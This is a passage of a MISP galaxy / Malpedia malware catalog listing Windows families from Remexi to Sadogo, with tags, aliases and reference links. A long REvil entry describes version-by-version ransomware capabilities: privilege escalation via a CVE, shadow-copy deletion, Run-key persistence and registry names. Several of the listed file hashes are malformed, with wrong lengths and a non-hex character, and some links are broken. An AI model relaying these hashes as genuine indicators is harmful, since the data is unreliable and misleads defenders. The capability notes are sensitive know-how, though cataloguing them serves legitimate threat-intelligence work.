The tag is: misp-galaxy:malpedia="Remexi"

Remexi is also known as:

- CACHEMONEY

Table 2375. Table References

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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi">https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-hickman">https://www.secureworks.com/research/threat-profiles/cobalt-hickman</a></td>
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<tr>
<td><a href="https://securelist.com/chafer-used-remexi-malware/89538/">https://securelist.com/chafer-used-remexi-malware/89538/</a></td>
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RemoteAdmin

The tag is: misp-galaxy:malpedia="RemoteAdmin"

RemoteAdmin is also known as:

Table 2376. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.remoteadmin">https://malpedia.caad.fkie.fraunhofer.de/details/win.remoteadmin</a></td>
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RemoteControl

The tag is: misp-galaxy:malpedia="RemoteControl"

RemoteControl is also known as:

- remotecontrolclient

Table 2377. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.remotecontrolclient">https://malpedia.caad.fkie.fraunhofer.de/details/win.remotecontrolclient</a></td>
</tr>
<tr>
<td><a href="https://github.com/frozleaf/RemoteControl">https://github.com/frozleaf/RemoteControl</a></td>
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Remsec

The tag is: misp-galaxy:malpedia="Remsec"

Remsec is also known as:

Table 2378. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider">https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider</a></td>
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<tr>
<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</a></td>
</tr>
<tr>
<td><a href="https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html">https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html</a></td>
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Remy
The tag is: *misp-galaxy:malpedia*="Remy"

Remy is also known as:

- WINDSHIELD

**Table 2379. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.remy">https://malpedia.caad.fkie.fraunhofer.de/details/win.remy</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/tin-woodlawn">https://www.secureworks.com/research/threat-profiles/tin-woodlawn</a></td>
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</table>

Rerdom
The tag is: *misp-galaxy:malpedia*="Rerdom"

Rerdom is also known as:

**Table 2380. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom">https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom</a></td>
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Retadup
The tag is: *misp-galaxy:malpedia*="Retadup"

Retadup is also known as:

**Table 2381. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup">https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup</a></td>
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<tr>
<td><a href="https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/">https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/</a></td>
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</tbody>
</table>
Retefe (Windows)

Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.

The tag is: `misp-galaxy:malpedia="Retefe (Windows)"

Retefe (Windows) is also known as:

- Tsukuba
- Werdlod

Table 2382. Table References

<table>
<thead>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe">https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe</a></td>
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<td><a href="https://github.com/cocaman/retefe">https://github.com/cocaman/retefe</a></td>
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<td><a href="https://www.govcert.admin.ch/blog/33/the-retefe-saga">https://www.govcert.admin.ch/blog/33/the-retefe-saga</a></td>
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<td><a href="https://www.govcert.admin.ch/blog/35/reversing-retefe">https://www.govcert.admin.ch/blog/35/reversing-retefe</a></td>
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<td><a href="https://github.com/Tomasuh/retefe-unpacker">https://github.com/Tomasuh/retefe-unpacker</a></td>
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<td><a href="https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/">https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/</a></td>
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Retro

The tag is: `misp-galaxy:malpedia="Retro"

Retro is also known as:

Table 2383. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.retro">https://malpedia.caad.fkie.fraunhofer.de/details/win.retro</a></td>
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<td><a href="https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/">https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/</a></td>
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Revenge RAT

The tag is: misp-galaxy:malpedia="Revenge RAT"

Revenge RAT is also known as:

- Revetrat

Table 2384. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat</a></td>
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<td><a href="https://isc.sans.edu/diary/rss/22590">https://isc.sans.edu/diary/rss/22590</a></td>
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<td><a href="https://securelist.com/revengehotels/95229/">https://securelist.com/revengehotels/95229/</a></td>
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<td><a href="https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated">https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated</a></td>
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<td><a href="https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/">https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/</a></td>
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<td><a href="https://blogs.360.cn/post/APT-C-44.html">https://blogs.360.cn/post/APT-C-44.html</a></td>
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<td><a href="https://blog.reversinglabs.com/blog/rats-in-the-library">https://blog.reversinglabs.com/blog/rats-in-the-library</a></td>
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<td><a href="https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/">https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/</a></td>
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<td><a href="https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g">https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g</a></td>
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Reveton Ransomware

The tag is: misp-galaxy:malpedia="Reveton Ransomware"

Reveton Ransomware is also known as:

Table 2385. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.reveton">https://malpedia.caad.fkie.fraunhofer.de/details/win.reveton</a></td>
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<td><a href="https://krebsonsecurity.com/2012/08/inside-a-reveton-ransomware-operation/">https://krebsonsecurity.com/2012/08/inside-a-reveton-ransomware-operation/</a></td>
</tr>
</tbody>
</table>
REvil

REvil Beta MD5: bed6fc04ebeb5815744706239a1f243 SHA1: 3d0649b5f76dbbf9f86b926afbd18ae028946bf SHA256: 3641b09bb6aae22579d4fd5aae420476a1345f948966944189a70af8032cb45 * Privilege escalation via CVE-2018-8453 (64-bit only) * Rerun with RunAs to elevate privileges * Implements a requirement that if "exp" is set, privilege escalation must be successful for full execution to occur * Implements target whitelisting using GetKeyboardLayoutList * Contains debug console logging functionality * Defines the REvil registry root key as SOFTWARE\test * Includes two variable placeholders in the ransom note: UID & KEY * Terminates processes specified in the "prc" configuration key prior to encryption * Deletes shadow copies and disables recovery * Wipes contents of folders specified in the "wld" configuration key prior to encryption * Encrypts all non-whitelisted files on fixed drives * Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe * Partially implements a background image setting to display a basic "Image text" message * Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)

REvil 1.00
MD5: 65aa793c00076217b2f86077bdafaea SHA1: 95a21e764ad0c80a3d034d293ae5511e7c8457 SHA256: f0c60f62ef9a9b712367f24a2611cb0e09fa48453841bc * Adds 32-bit implementation of CVE-2018-8453 exploit * Removes console debug logging * Changes the REvil registry root key to SOFTWARE\recfg * Removes the System/Impersonation success requirement for encrypting network mapped drives * Adds a "wipe" key to the configuration for optional folder wiping * Fully implements the background image setting and leverages values defined in the "img" configuration key * Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT * Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL * Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data

REvil 1.01 MD5: 2abff29b4d87f30f011874b6e9809e9 SHA1: 9d1b6b1cba411ee6d4664ba2561fa59c0732c SHA256: a88e2857a2f3922b44247316642f08a8665185297e3cd958bbd22a83f380feb * Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level * Makes encryption of network mapped drives optional by adding the "-nolan" argument
REvil 1.02
MD5: 4af953b20f3a1f165e7cf31d6156c035
SHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299
SHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4
* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage
  and GetSystemDefaultUILanguage
* Partially implements "lock file" logic by generating a lock filename based on the
  first four bytes of the Base64-decoded pk key, appending a .lock file extension, and
  adding the filename to the list of whitelisted files in the REvil configuration (It
does not appear that this value is referenced after it is created and stored in
memory. There is no evidence that a lock file is dropped to disk.)
* Enhances folder whitelisting logic that take special considerations if the folder is
  associated with "program files" directories
* Hard-codes whitelisting of all direct content within the Program Files or Program
  Files x86 directories
* Hard-codes whitelisting of "sql" subfolders within program files
* Encrypts program files sub-folders that does not contain "sql" in the path
* Compares other folders to the list of whitelisted folders specified in the REvil
  configuration to determine if they are whitelisted
* Encodes stored strings used for URI building within the binary and decodes them in
  memory right before use
* Introduces a REvil registry root key "sub_key" registry value containing the
  attacker's public key

REvil 1.03
MD5: 3cae02306a95564b1fff4ea45a7dfc00
SHA1: 0ce2cae5287a64138d273007b34933362901783d
SHA256: 78fa32f1792244c46ae81252c841e75ee4e8ob57e6b026d0a05bb07d34ec37bbf
* Removes lock file logic that was partially implemented in 1.02
* Leverages WMI to continuously monitor for and kill newly
  launched processes whose names are listed in the prc configuration key (Previous versions
  performed this action once.)
* Encodes stored shellcode
* Adds the -path argument
* Does not wipe folders (even if wipe == true)
* Does not set desktop background
* Does not contact the C2 server
* Encrypts files in the specified folder and drops the ransom note
* Changes the REvil registry root key to SOFTWARE\QtProject\OrganizationDefaults
* Changes registry key values from -- to: * sub_key -- pvg * pk_key -- sxsP * sk_key -- BDDC8 * 0_key -- f7gVD7 * rnd_ext -- Xu7NnkD * stat -- sMMnxpgk
REvil 1.04
MD5: 6e3efb83299d800edf1624ebc0665e7
SHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d
SHA256: 2ca64afea5abb66f96677fbc2bc0e1995b3bc934727af884139aa757240e3f6
* Leverages PowerShell and WMI to delete shadow copies if the victim's operating
system is newer than Windows XP (For Windows XP or older, it uses the original command
that was executed in all previous REvil versions.)
* Removes the folder wipe capability
* Changes the REvil registry root key to SOFTWARE\GitForWindows
* Changes registry key values from --> to:
  * pvg --> QPM
  * sxsp --> cMtS
  * BDDC8 --> WGG7j
  * f7vG7 --> zbhs8h
  * Xu7NnkD --> H85TP10
  * sMMnxpgk --> GCZg2PX

REvil  v1.05   MD5:  cfe2edc5c4c74b76e7d1d29e69b2   SHA1: 7423c57db390def08154b77e2b5e043d92d320c7
SHA256: e430479d1ca03a1bc5414e28f6c6dbb301939c4c95547492cddb7b0a123344ea
* Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to
implement persistence. * Implements persistence functionality via registry Run key. Data for value
is set to the full path and filename of the currently running executable. The executable is never
moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence
setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' :
* SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lNOWZyAWVv
* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the
destination to NULL and the flags to 4 (MOVEFILE_DELAYUntil_REBOOT). This breaks persistence
however as the target executable specified in the Run key will no longer exist once this is done.
* Changes registry key values from --> to: * QPM --> tger * cMtS --> 8K09 * WGG7j --> xMtNc * zbhs8h
  --> CTgE4a * H85TP10 --> oE5bZg0 * GCZg2PX --> DC408Qp4
REvil v1.06
MD5: 65ff37973426c09b9ff95f354e62959e
SHA1: b53bc09cfd292af7b3609734a99d101bd24d7e
SHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6b08d9b62f1e
* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.
* Modified handling of network file encryption. Now explicitly passes every possible "Scope" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.
* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'
* Changes registry key values from --> to:
  * tGE --> 73g
  * 8K09 --> vT6j
  * xMtNc --> Q7PZe
  * CTgE4a --> BuCrIp
  * oE5bZg0 --> tCzd70Y
  * DC408Qp4 --> sLF86MWC

REvil v1.07  
MD5: ea4cae3d6d8150215a4d90593a4c30f2  
SHA1: 8dcbcbefaaf5675b170af3fd44db93ad864894e  
SHA256: 6a2bd52a5d68a7250d1de481dce91a32f54824c1c540f0a040d05f757220cd3

The tag is: misp-galaxy:malpedia="REvil"

REvil is also known as:
- Sodin
- Sodinokibi

Table 2386. Table References

Links

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- https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004
- https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html
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<td><a href="https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020ICS_REPORT_EN.pdf">https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020ICS_REPORT_EN.pdf</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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RGDoor

The tag is: misp-galaxy:malpedia="RGDoor"

RGDoor is also known as:

Table 2387. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor">https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-gypsy">https://www.secureworks.com/research/threat-profiles/cobalt-gypsy</a></td>
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<td><a href="https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view">https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-lyceum">https://www.secureworks.com/research/threat-profiles/cobalt-lyceum</a></td>
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Rhino Ransomware

The tag is: misp-galaxy:malpedia="Rhino Ransomware"

Rhino Ransomware is also known as:

Table 2388. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino">https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino</a></td>
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**RHttpCtrl**

The tag is: *misp-galaxy:malpedia="RHttpCtrl"*

RHttpCtrl is also known as:

Table 2389. Table References

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**Rietspoof**

Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.

The tag is: *misp-galaxy:malpedia="Rietspoof"*

Rietspoof is also known as:

Table 2390. Table References

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**Rifdoor**

The tag is: *misp-galaxy:malpedia="Rifdoor"*

Rifdoor is also known as:

Table 2391. Table References

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Rikamanu
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Table 2392. Table References

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<tr>
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Rincux
The tag is: `misp-galaxy:malpedia="Rincux"`
Rincux is also known as:

Table 2393. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux">https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux</a></td>
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Ripper ATM
The tag is: `misp-galaxy:malpedia="Ripper ATM"`
Ripper ATM is also known as:

Table 2394. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm">https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm</a></td>
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Rising Sun
The tag is: `misp-galaxy:malpedia="Rising Sun"`
Rising Sun is also known as:

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun">https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun</a></td>
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</table>
RMS

CyberInt states that Remote Manipulator System (RMS) is a legitimate tool developed by Russian organization TektonIT and has been observed in campaigns conducted by TA505 as well as numerous smaller campaigns likely attributable to other, disparate, threat actors. In addition to the availability of commercial licenses, the tool is free for non-commercial use and supports the remote administration of both Microsoft Windows and Android devices.

The tag is: `misp-galaxy:malpedia="RMS"`

RMS is also known as:

- Gussdoor
- Remote Manipulator System

Table 2396. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rms">https://malpedia.caad.fkie.fraunhofer.de/details/win.rms</a></td>
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RobinHood

The tag is: `misp-galaxy:malpedia="RobinHood"`

RobinHood is also known as:

- RobbinHood

Table 2397. Table References

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rock

The tag is: misp-galaxy:malpedia="rock"

rock is also known as:

- yellowalbatross

Table 2398. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rock">https://malpedia.caad.fkie.fraunhofer.de/details/win.rock</a></td>
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Rockloader

The tag is: misp-galaxy:malpedia="Rockloader"

Rockloader is also known as:

Table 2399. Table References

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**Rofin**

The tag is: *misp-galaxy:malpedia="Rofin"*

Rofin is also known as:

*Table 2400. Table References*

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**RogueRobinNET**

A .NET variant of ps1.roguerobin

The tag is: *misp-galaxy:malpedia="RogueRobinNET"*

RogueRobinNET is also known as:

*Table 2401. Table References*

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**Rokku**

The tag is: *misp-galaxy:malpedia="Rokku"*

Rokku is also known as:

*Table 2402. Table References*

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</table>
RokRAT

It is a backdoor commonly distributed as an encoded binary file downloaded and decrypted by shellcode following the exploitation of weaponized documents. DOGCALL is capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex.

The tag is: misp-galaxy:malpedia="RokRAT"

RokRAT is also known as:

• DOGCALL

Table 2403. Table References

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Rombertik

The tag is: misp-galaxy:malpedia="Rombertik"

Rombertik is also known as:

- CarbonGrabber

Table 2404. Table References

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Romeo(Alfa,Bravo, ...) 

The tag is: misp-galaxy:malpedia="Romeo(Alfa,Bravo, ...)"

Romeo(Alfa,Bravo, ...) is also known as:

Table 2405. Table References

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Roopirs

The tag is: misp-galaxy:malpedia="Roopirs"

Roopirs is also known as:

Table 2406. Table References

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Roseam

The tag is: misp-galaxy:malpedia="Roseam"

Roseam is also known as:

Table 2407. Table References

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<tr>
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</table>
RotorCrypt

Ransomware that was discovered over the last months of 2016 and likely based on Gomasom, another ransomware family.

The tag is: misp-galaxy:malpedia="RotorCrypt"

RotorCrypt is also known as:

- RotoCrypt
- Rotor

Table 2408. Table References

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<tr>
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<td><a href="https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/">https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/</a></td>
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Rover

The tag is: misp-galaxy:malpedia="Rover"

Rover is also known as:

Table 2409. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rover">https://malpedia.caad.fkie.fraunhofer.de/details/win.rover</a></td>
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<tr>
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</table>

Rovnix

Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).

The tag is: misp-galaxy:malpedia="Rovnix"

Rovnix is also known as:
• BkLoader
• Cidox
• Mayachok

*Table 2410. Table References*

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<tr>
<td><a href="http://www.malwaretech.com/2014/05/rovnix-new-evolution.html">http://www.malwaretech.com/2014/05/rovnix-new-evolution.html</a></td>
</tr>
<tr>
<td><a href="http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html">http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/oh-what-a-boot-iful-mornin/97365">https://securelist.com/oh-what-a-boot-iful-mornin/97365</a></td>
</tr>
</tbody>
</table>

**RoyalCli**

RoyalCli is a backdoor which appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary. RoyalCli and BS2005 both communicate with the attacker’s command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2.

The tag is: *misp-galaxy:malpedia="RoyalCli"*

RoyalCli is also known as:

*Table 2411. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli">https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli</a></td>
</tr>
<tr>
<td><a href="https://github.com/nccgroup/Royal_APT">https://github.com/nccgroup/Royal_APT</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-palace">https://www.secureworks.com/research/threat-profiles/bronze-palace</a></td>
</tr>
</tbody>
</table>
**Royal DNS**

RoyalDNS is a DNS based backdoor used by APT15 that persistences on a system through a service called 'Nwsapagent'.

The tag is: *misp-galaxy:malpedia="Royal DNS"*

Royal DNS is also known as:

*Table 2412. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns">https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns</a></td>
</tr>
<tr>
<td><a href="https://github.com/nccgroup/Royal_APT">https://github.com/nccgroup/Royal_APT</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-palace">https://www.secureworks.com/research/threat-profiles/bronze-palace</a></td>
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</table>

**Rozena**

The tag is: *misp-galaxy:malpedia="Rozena"*

Rozena is also known as:

*Table 2413. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena">https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena</a></td>
</tr>
<tr>
<td><a href="https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena">https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena</a></td>
</tr>
</tbody>
</table>

**RTM**

RTM Banker also known as Redaman was first blogged about in February 2017 by ESET. The malware is written in Delphi and shows some similarities (like process list) with Buhtrap. It uses a slightly modified version of RC4 to encrypt its strings, network data, configuration and modules, according to ESET.

The tag is: *misp-galaxy:malpedia="RTM"*

RTM is also known as:

- Redaman

*Table 2414. Table References*

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<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm">https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm</a></td>
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</table>
**rtpos**

The tag is: `misp-galaxy:malpedia="rtpos"`

**Ruckguv**

The tag is: `misp-galaxy:malpedia="Ruckguv"`

**Rumish**

The tag is: `misp-galaxy:malpedia="Rumish"`

**running_rat**

The tag is: `misp-galaxy:malpedia="running_rat"`
running_rat is also known as:

Table 2418. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat">https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat</a></td>
</tr>
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**Rurktar**

The tag is: *misp-galaxy:malpedia="Rurktar"

Rurktar is also known as:

- RCSU

Table 2419. Table References

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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar">https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar</a></td>
</tr>
<tr>
<td><a href="https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction">https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction</a></td>
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**Rustock**

The tag is: *misp-galaxy:malpedia="Rustock"

Rustock is also known as:

Table 2420. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock">https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock</a></td>
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<tr>
<td><a href="http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html">http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html</a></td>
</tr>
<tr>
<td><a href="https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/">https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/</a></td>
</tr>
<tr>
<td><a href="http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSAr">http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSAr</a> ticles_PRDrWEB_RustockC_eng.pdf</td>
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<tr>
<td><a href="https://www.secureworks.com/blog/research-21041">https://www.secureworks.com/blog/research-21041</a></td>
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<td><a href="http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/">http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/</a></td>
</tr>
</tbody>
</table>

**Ryuk**

Ryuk is a ransomware which encrypts its victim's files and asks for a ransom via bitcoin to release the original files. It is has been observed being used to attack companies or professional
environments. Cybersecurity experts figured out that Ryuk and Hermes ransomware shares pieces of codes. Hermes is commodity ransomware that has been observed for sale on dark-net forums and used by multiple threat actors.

The tag is: misp-galaxy:malpedia="Ryuk"

Ryuk is also known as:

Table 2421. Table References

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<td><a href="https://malpedia.caad.fraunhofer.de/details/win.ryuk">https://malpedia.caad.fraunhofer.de/details/win.ryuk</a></td>
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<td><a href="https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/">https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/</a></td>
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<td><a href="https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/">https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/</a></td>
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<td><a href="https://community.riskiq.com/article/0bcefe76">https://community.riskiq.com/article/0bcefe76</a></td>
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<td><a href="https://www.hhs.gov/sites/default/files/bazarloader.pdf">https://www.hhs.gov/sites/default/files/bazarloader.pdf</a></td>
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<td><a href="https://www.crowdstrike.com/blog/wizard-spider-adversary-update/">https://www.crowdstrike.com/blog/wizard-spider-adversary-update/</a></td>
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<td><a href="https://twitter.com/anthomsec/status/1321865315513520128">https://twitter.com/anthomsec/status/1321865315513520128</a></td>
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<td><a href="https://www.scythe.io/library/threatthursday-ryuk">https://www.scythe.io/library/threatthursday-ryuk</a></td>
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<td><a href="https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/">https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-345a">https://us-cert.cisa.gov/ncas/alerts/aa20-345a</a></td>
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<td><a href="https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv">https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv</a></td>
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<td><a href="https://sites.temple.edu/care/ci-rw-attacks/">https://sites.temple.edu/care/ci-rw-attacks/</a></td>
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<td><a href="https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/">https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/</a></td>
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<td><a href="https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/">https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/</a></td>
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<td><a href="https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/">https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/</a></td>
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<td><a href="https://twitter.com/IntelAdvanced/status/1353546534676258816">https://twitter.com/IntelAdvanced/status/1353546534676258816</a></td>
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<td><a href="https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/">https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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<tr>
<td><a href="https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/">https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/</a></td>
</tr>
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</table>
Ryuk Stealer

Information Stealer that searches for sensitive documents and uploads its results to an FTP server. Skips files with known Ryuk extensions.

The tag is: misp-galaxy:malpedia="Ryuk Stealer"

Ryuk Stealer is also known as:

Table 2422. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer
https://twitter.com/VK_Intel/status/1171782155581689858
Sadogo Ransomware

The tag is: `misp-galaxy:malpedia="Sadogo Ransomware"`

Sadogo Ransomware is also known as:

Table 2423. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sadogo">https://malpedia.caad.fkie.fraunhofer.de/details/win.sadogo</a></td>
